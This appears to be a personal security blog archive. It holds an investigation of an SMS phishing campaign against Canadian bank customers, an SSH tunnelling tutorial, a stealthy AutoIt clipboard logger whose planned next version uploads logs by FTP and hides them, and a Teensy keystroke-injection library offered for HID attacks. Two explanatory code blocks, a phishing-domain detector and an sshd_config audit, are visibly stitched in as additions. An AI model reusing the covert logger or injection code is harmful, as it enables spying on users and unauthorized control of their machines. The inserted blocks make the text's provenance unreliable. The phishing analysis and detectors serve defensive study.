Unmasking a Phishing campaign targeting major Canadian Banking customers

It was a lazy Sunday afternoon when I got a Twitter alert about an SMS phishing campaign targeting customers of the Royal Bank of Canada (RBC).

Smishing (SMS + Phishing)


Being my naturally curious self on a slow afternoon, I started poking around the site and quickly discovered two things:

  1. hxxp://rbc[.]com[.]ssl-sec-mls-119[.]com/r/ - the /r/ portion intrigued me

  2. I also found a page called /r/counter/ by analyzing the form submission page

rbc1.jpg

Going through the data in the counter page I quickly realized that these IP addresses belong to potential victims. Out of the 701 records, 60 users (roughly 10%) submitted all of their data to the attacker. Sample below.

rbc2.jpg

With this knowledge in mind, I wanted to get back to /r/ and fuzz that letter to see what else returned an HTTP status 200. I hypothesized that the 'r' in /r/ stood for "RBC", so I tried '/c/' for "CIBC", and to my delight I got a status 200 and a familiar-looking website.

cibc1.jpg

My immediate next step was to determine whether this page had already been used to phish unsuspecting victims, so I made my way over to "/c/counter/". This time, to my surprise, I saw a total count of 1068 potential victims, with approximately 10% having provided all of their information to the attacker. At this point I decided to fuzz 'a..z' and see which letters returned a status 200, and to collect the data from each counter page. I was also convinced by now that this attacker had been doing this for some time, and that I had to do something to unmask the operation and the infrastructure at the very least. The research uncovered 6 phishing pages targeting customers of the following Canadian banks:

  1. BMO - /b/

  2. CIBC - /c/

  3. RBC - /r/

  4. Desjardins - /d/

  5. Tangerine - /t/

  6. Scotia Bank - /s/

It was also obvious that all of these sites had been used, or were still in use, to phish Canadians.

counters.JPG

The Infrastructure

  1. IP - 47[.]74[.]225[.]213

  2. URL - http://rbc[.]com[.]ssl-sec-mls-119[.]com/r/

The domain was registered on the 29th of December, 2018.

Hosted on  Alibaba cloud


111 Parent domains  -  https://pastebin.com/shzRhwGd


We notified the banks and received responses from CIBC and RBC. All the domains hosted on this server looked shady, built for cryptocurrency online casinos and phishing; check out the Pastebin link if you are interested. One interesting finding from the logs was a submission from ::1, the loopback address, dated March 03, 2018. This further confirms that we are dealing with a persistent threat actor.
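The hostname pattern behind this campaign (a bank's real domain used as the leading labels of a completely different registered domain, such as rbc[.]com[.]ssl-sec-mls-119[.]com) is easy to flag automatically. The following is an added example, not code from the original post: a small Python detector that refangs defanged indicators, extracts the host, and reports when a known bank domain appears as a prefix of a host whose registered domain is not the bank's. The bank-to-domain mapping, the naive "last two labels" registered-domain rule, and all sample indicators other than the one from the post are assumptions constructed for the example; a production version would use the Public Suffix List.

```python
import re
from urllib.parse import urlsplit

# Brand lookup: legitimate registered domain -> brand name. Constructed for this
# example (assumption); covers the six banks named in the post.
BANK_DOMAINS = {
    "rbc.com": "RBC",
    "cibc.com": "CIBC",
    "bmo.com": "BMO",
    "desjardins.com": "Desjardins",
    "tangerine.ca": "Tangerine",
    "scotiabank.com": "Scotiabank",
}

# Constructed sample feed: the first two entries reflect the post's URL pattern,
# the rest are made up to exercise the legitimate and lookalike cases.
SAMPLE_IOCS = [
    "hxxp://rbc[.]com[.]ssl-sec-mls-119[.]com/r/",
    "hxxp://rbc[.]com[.]ssl-sec-mls-119[.]com/c/",
    "https://www.rbc.com/",
    "https://online.cibc.com/",
    "cibc[.]com[.]example-lookalike[.]test/c/",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator (hxxp://, [.], [:]) back into a parseable URL."""
    s = ioc.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def registered_domain(host: str) -> str:
    """Naive eTLD+1 (last two labels). Adequate for .com/.ca; a real deployment
    would consult the Public Suffix List instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def lookalike_verdict(ioc: str):
    """Return (brand, registered_domain) when a bank's domain is used as the
    leading labels of a host that is NOT under that bank's domain, else None."""
    url = refang(ioc)
    if "://" not in url:
        url = "http://" + url          # host-only indicator
    host = (urlsplit(url).hostname or "").lower()
    reg = registered_domain(host)
    for bank_domain, brand in BANK_DOMAINS.items():
        if host == bank_domain or host.endswith("." + bank_domain):
            return None                # genuinely under the bank's own domain
        if host.startswith(bank_domain + ".") and reg != bank_domain:
            return (brand, reg)        # brand-prefixed lookalike on another domain
    return None


def scan(iocs):
    """Return [(ioc, brand, registered_domain)] for every flagged indicator."""
    hits = []
    for ioc in iocs:
        verdict = lookalike_verdict(ioc)
        if verdict is not None:
            hits.append((ioc, verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for ioc, brand, reg in scan(SAMPLE_IOCS):
        print(f"{ioc}: impersonates {brand}, actually hosted on {reg}")
```

Hosts that really are under the bank's domain (www.rbc.com, online.cibc.com) pass, while any host that merely starts with the bank's domain is flagged together with the domain the attacker actually controls, which is the value a blocklist or takedown request needs.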

The attacker testing if the code works? Thoughts?


I would love to hear what you think. How should law enforcement and the authorities respond to something like this? Do you feel the banks should do more to identify the impacted users and notify them? Thanks for reading; my slow Sunday afternoon turned out to be fun, and I hope you had fun reading too.

SSH Tunnelling & Secure Browsing: Part III

ssh -D 8080 [username]@[server name]

This time I will go over setting up the SSH client in Linux, setting up key pairs, and how to use keys for authentication in Linux and in Windows.

Setting up tunnelling in Linux is as easy as typing in:


SSH Tunnelling & Secure Browsing: Part II

If you have completed Part I, you should have a running SSH server ready to tunnel all your needs. If you are on a PC running Microsoft's Windows operating system like me, download PuTTY 0.62-installer.exe from http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.62-installer.exe and install it. PuTTY will be our SSH client and we are going to cover:

  1. Password authentication
  2. Asymmetric key-based authentication (RSA)

The second method is the most secure if implemented properly. Once PuTTY is installed it should have created an icon on your desktop. Open PuTTY and you will see the screen below:

Default PuTTY Screen

Fill in the fields as necessary:

  • Host Name: [username]@[server name]|[IP address]
  • Port: 22 (the default)
  • Connection type: SSH
  • Saved Sessions: [any name of your liking]

Once this information is filled in click on "Connection" > expand "SSH" > "Tunnels" and fill the tunnel information.

Tunnel Configuration

Click "Add" when done. On the menu to the left, scroll all the way up, click "Session" and then click "Save" to store the configuration. Click "Open" to launch the connection. If this is the first time you are connecting, PuTTY will warn that the server's host key is not recognized; click "Yes" to save the key in the registry. I will go over host key verification in another post. You will then be prompted for your password; type it to complete the login. Once in, open your browser of choice, change the proxy settings to SOCKSv5 with Server / IP = 127.0.0.1, Port: 8090, and you will be tunneling traffic like 1337.

Part III will cover setting up the SSH client in Linux and public/private key based authentication in Linux and Windows. Hope you enjoyed; please comment below.

SSH Tunnelling & Secure Browsing: Part I

Checking your Facebook page from Starbucks? Checked your banking information from the Hotel WiFi? Or are you going to Defcon this year? 

Public internet access is not secure, and there is a need for secure browsing. There are many ways to achieve this, obfuscate the traffic from eavesdroppers and protect ourselves against Man In The Middle (MITM) attacks. After trying a few different solutions like the Tor Project, Hotspot Shield and others like them, I decided to set up my own SSH server so that I can create a secure tunnel between my laptop and the SSH server and use it as a SOCKSv5 proxy. If you are still interested, I will try to cover the following topics over the next few days:
  1. Install and configure an SSH server (FreeBSD 9.0)
  2. Create users.
  3. Secure and harden the server.
  4. Configure the SSH client (PuTTY) in Windows
  5. Create public and private keys for authentication
  6. Set up password-less login.
I wanted to point out that FreeBSD is really stable, uses very few resources, and is my server of choice. I have tested the same with Debian 6.0.4 and it works just as well. All the steps I am about to show should be easy to replicate on all *NIX type systems. I also wanted to point out that a Virtual Private Server will give you better performance than hosting the SSH server at home.
Server Specs:

Installation Steps:

  1. Create the guest machine (Guest VM Configuration)
  2. Save and power on. The VM should boot from the DVD; press Enter to continue.
  3. Play this video for the actual installation steps

Configuration Steps:

  • Create a new user by typing "adduser" then Enter. P.S. add the user to the "wheel" group so that the user can invoke "su -"

FreeBSD Account Setup

  • Login as the newly created user
  • mkdir ~/.ssh
  • chmod 700 ~/.ssh
  • su -
  • Enter the root password
  • cp /etc/ssh/sshd_config ~/sshd_config.orig
  • cd /home/n3onli8
  • cp /etc/ssh/sshd_config /home/n3onli8/sshd_config
  • vi sshd_config
  • I configured it to look like this:

Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key

KeyRegenerationInterval 1h
ServerKeyBits 1024
LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
PubkeyAuthentication yes
AuthorizedKeysFile    %h/.ssh/authorized_keys
# Change to NO to enable built-in password authentication.
PasswordAuthentication yes
PermitEmptyPasswords no
UsePAM no
AllowAgentForwarding yes
AllowTcpForwarding yes
GatewayPorts yes
X11Forwarding yes
X11DisplayOffset 10
X11UseLocalhost yes
PrintLastLog yes
TCPKeepAlive yes
PermitTunnel yes
# override default of no subsystems
Subsystem    sftp    /usr/libexec/sftp-server

  • Write the changes and quit
  • rm /etc/ssh/sshd_config
  • mv /home/n3onli8/sshd_config /etc/ssh/sshd_config
  • /etc/rc.d/sshd restart
  • exit (leave the su shell)

See man ssh for a better understanding of sshd_config.
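The listing above is the kind of file worth re-checking after every edit, because a couple of its settings (GatewayPorts yes, X11Forwarding yes, PermitTunnel yes, and PasswordAuthentication yes once keys are in place) widen the server beyond what a SOCKS tunnel needs. The following is an added example, not code from the original post: a Python audit that parses an sshd_config and reports the settings that differ from a minimal-exposure baseline. It assumes the sshd_config(5) rules that keywords are case-insensitive, '#' starts a comment, and for a repeated keyword the first value obtained is the one sshd uses; the embedded sample is constructed from the Part I listing, and the baseline and default table are this example's own choices.

```python
"""Audit an sshd_config against a minimal-exposure baseline for a SOCKS tunnel host."""

# Constructed sample, copied from the Part I listing (the post's own settings).
SAMPLE_SSHD_CONFIG = """\
Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
PubkeyAuthentication yes
AuthorizedKeysFile    %h/.ssh/authorized_keys
# Change to NO to enable built-in password authentication.
PasswordAuthentication yes
PermitEmptyPasswords no
UsePAM no
AllowTcpForwarding yes
GatewayPorts yes
X11Forwarding yes
PermitTunnel yes
Subsystem    sftp    /usr/libexec/sftp-server
"""

# OpenSSH defaults (sshd_config(5)) for the keywords this audit models; a keyword
# absent from the file takes its default. PermitRootLogin is deliberately not
# listed because its default changed across OpenSSH releases.
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "gatewayports": "no",
    "x11forwarding": "no",
    "permittunnel": "no",
}

# Baseline: (keyword, acceptable values, finding text). Chosen for this example.
CHECKS = [
    ("protocol", {"2"}, "only protocol 2 should be enabled"),
    ("permitrootlogin", {"no", "prohibit-password", "without-password"},
     "root should not log in directly; use a wheel user and su"),
    ("passwordauthentication", {"no"},
     "passwords are accepted; once key authentication works, set it to no"),
    ("permitemptypasswords", {"no"}, "empty passwords must never be accepted"),
    ("gatewayports", {"no"},
     "forwarded ports bind to all interfaces instead of just the loopback"),
    ("x11forwarding", {"no"}, "X11 forwarding is not needed for a SOCKS proxy host"),
    ("permittunnel", {"no"}, "tun-device forwarding is broader than a -D tunnel needs"),
]


def parse_sshd_config(text: str) -> dict:
    """Return {keyword_lowercased: [values in file order]} for effective lines.
    Comment and blank lines are skipped; parsing stops at the first Match block,
    since everything after it is conditional rather than global."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        value = parts[1].strip() if len(parts) > 1 else ""
        settings.setdefault(key, []).append(value)
    return settings


def effective_value(settings: dict, key: str):
    """The value sshd will actually use: the FIRST occurrence wins, not the last.
    Returns the modelled default when the keyword is absent, or None if unknown."""
    values = settings.get(key)
    if values:
        return values[0].lower()
    return DEFAULTS.get(key)


def audit(settings: dict) -> list:
    """Return [(keyword, effective_value, finding)] for every baseline deviation."""
    findings = []
    for key, acceptable, msg in CHECKS:
        value = effective_value(settings, key)
        if value is None:
            findings.append((key, "<not set>", "not set explicitly; " + msg))
        elif value not in acceptable:
            findings.append((key, value, msg))
    return findings


if __name__ == "__main__":
    for key, value, msg in audit(parse_sshd_config(SAMPLE_SSHD_CONFIG)):
        print(f"{key} = {value}: {msg}")
```

Run against the Part I listing it flags PasswordAuthentication, GatewayPorts, X11Forwarding and PermitTunnel; the first-occurrence rule matters because a hardening line appended to the bottom of the file is silently ignored if the same keyword already appears higher up.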

Part II will cover setting up PuTTY in MS Windows.

Thanks for reading. Comment below

Autoit: Clipboard Logger

This code will create an executable of approximately 300KB that runs on your computer logging clipboard data to a text file at %USERPROFILE%\ClipLog.log
  1. Download Autoit from http://www.autoitscript.com/site/
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view the logged clipboard text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy the log to FTP
  • Auto-start the program on power on.
  • Encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0

#NoTrayIcon
#include <File.au3>
#include <Clipboard.au3>

Global $Clippy = ""        ; text currently on the clipboard
Global $txtClipboard = ""  ; last text seen, so each change is logged only once

While 1
    $Clippy = _ClipBoard_GetData()           ; returns 0 when the clipboard holds no text
    If $Clippy <> "0" Then
        If $Clippy <> $txtClipboard Then     ; log only when the content changed
            _FileWriteLog(@UserProfileDir & "\ClipLog.log", $Clippy)
        EndIf
    EndIf
    $txtClipboard = $Clippy
    Sleep(100)                               ; poll ten times a second
WEnd
Exit

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h: http://pastebin.com/7dhjJdfN

#include <n3onli8.h>

void AltF(){
   Keyboard.set_modifier(MODIFIERKEY_ALT);
   Keyboard.send_now();
   Keyboard.set_key1(KEY_F);
   Keyboard.send_now();
   delay(200);
   Keyboard.set_modifier(0);
   Keyboard.set_key1(0);
   Keyboard.send_now();
   delay(200);
}

void setup(){
  Serial.begin(9600);
  delay(2500);
  Minimize();
  delay(200);
  PrintScreen();
  delay(200);
  Menu();
  delay(500);
  Keyboard.print("V");
  delay(200);
  Keyboard.print("D");
  delay(200);
  StartRUN();
  delay(500);
  Keyboard.print("mspaint.exe");
  delay(200);
  Enter();
  delay(350);
  Paste();
  delay(200);
  Save();
  delay(200);
  Keyboard.print("%USERPROFILE%\\h4ck.bmp");
  delay(200);
  Enter();
  delay(500);
  AltF();
  delay(100);
  Keyboard.print("K");
  delay(100);
  Keyboard.print("F");
  delay(100);
  AltF4();
  delay(200);
  Minimize(); //Restoring Windows GUI+D
}

void loop(){
}

n3onli8.h Advanced PHUKD Library Complete

Finally completed building the n3onli8.h Teensy library for HID attacks. I wanna call this version 0.1 since I have big plans for this library. Hope you guys enjoy:

/*********************n3onli8.h**************************/

#ifndef N3ONLI8_H_INCLUDED
#define N3ONLI8_H_INCLUDED

#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();

#endif
/*******************************************************/
//http://pastebin.com/haVm6smL

/************************n3onli8.cpp**********************/

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_DELETE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
}

void StartRUN()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    delay(1500);
 
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();  
    Keyboard.set_key1(KEY_BACKSPACE);
    Keyboard.send_now();
    delay(100);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
}

void Enter()
{
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void PrintScreen()
{
    Keyboard.set_key1(KEY_PRINTSCREEN);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void Minimize()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_D);
    Keyboard.send_now();
    delay(300);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Menu()
{
    Mouse.set_buttons(0, 0, 1);
    Mouse.set_buttons(0, 0, 0);
}

void AltF4()
{
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_F4);
    Keyboard.send_now();
    delay(200);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Paste()
{
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_V);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Save()
{
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_S);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}
/**********************************************************/
//http://pastebin.com/YKPc6pgK

Save the two files in a folder called n3onli8.h and copy the folder into your Arduino\Libraries folder.
Remember >> With great power comes great responsibility...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a Teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at irongeek.com, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from Hak5.org has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.